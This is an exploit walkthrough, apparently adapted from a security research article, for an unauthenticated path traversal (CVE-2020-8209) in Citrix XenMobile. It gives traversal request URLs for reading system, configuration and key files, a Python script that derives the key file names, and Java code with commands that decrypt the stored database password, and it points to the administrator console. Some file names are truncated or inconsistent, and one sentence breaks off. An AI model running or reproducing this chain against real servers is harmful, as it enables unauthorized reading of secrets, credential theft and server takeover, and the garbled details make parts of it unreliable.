XenMobile directory traversal to read arbitrary files (CVE-2020-8209)
Using this vulnerability, it is possible to read arbitrary files outside the root directory of the Web server, including configuration files and sensitive encryption keys. No authorization is required.
POC (path traversal)
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
Decrypt configuration password
Read configuration
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties
The password is encrypted and stored in one of two formats: {aes} [base64 text] or {aes} {db} [base64 text]. Encryption is handled by the libraries /opt/sas/sw/lib/libsecure.so and DataSecurity.jar. In order to decrypt, the corresponding key is required.
They are located in the file /opt/sas/rt/keys/security.properties and can be downloaded using the path traversal vulnerability.
Use algorithm to hash each parameter P.TXT1, P.TXT2, P.TXT3
test.py
from base64 import b64encode
from hashlib import sha256
print(b64encode(sha256(b'xxsbovqwtroclyjdrmgk').digest()).decode('ascii').translate({
47:None,61:None}))
print(b64encode(sha256(b'zxxwzveilgqsxhphdveh').digest()).decode('ascii').translate({
47:None,61:None}))
print(b64encode(sha256(b'pxicutcshrkhkyxpyvdg').digest()).decode('ascii').translate({
47:None,61:None}))
Generate three files dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt
+KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt
ANDHaDrHC4m3G2ut1DkkY1IM0N9.txt and download them through traversal.
Pit: "+" is escaped as %2b
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt
/jsp/help-sb-download.jsp?
sbFileName=../../../opt/sas/rt/keys/+KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/ANDHaDrHC4m3G2ut1DkkY1IM0N9ok4R6r+gEVGv9+8.txt
/opt/sas/sw/lib/libsecure.so
A library for encryption is required.
The most urgent task is to save these files (security.properties, dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt
+KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt
ANDHaDrHC4m3G2ut1g9.
Pit: The above 5 files must be placed in the corresponding web directory, and opt in the root directory.
Three Java libraries are also needed, saved to a folder: /opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/DataSecurity.jar, /opt/sas/sw/tomcat/inst1/webapps /ROOT/WEB-INF/lib/common-interfaces.jar, /opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/slf4j-api-1.6.4.jar.
In the folder, create a decrypt.class file with the following content and compile it.
javac -cp DataSecurity.jar decrypt.java
import com.citrix.xms.security.DataSecurity;
class decrypt {
public static void main(String[] args) {
if (args.length < 1) {
System.out.println("Usage:\n decrypt [encrypted string]");
return;
}
System.out.println(DataSecurity.decryptDbPassword(args[0]));
}
}
By arranging all the data correctly, we can decrypt the password from the configuration file.
java -cp ./DataSecurity.jar:./common-interfaces.jar:./slf4j-api-1.6.4.jar:. decrypt {
aes}{
db}trsPTT4DkG9nMqXpv1Mi8H8nTQBMqqINy+G4VcMgyyE= 2>/dev/null
Web console default user Administrator
Quoting the article
https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/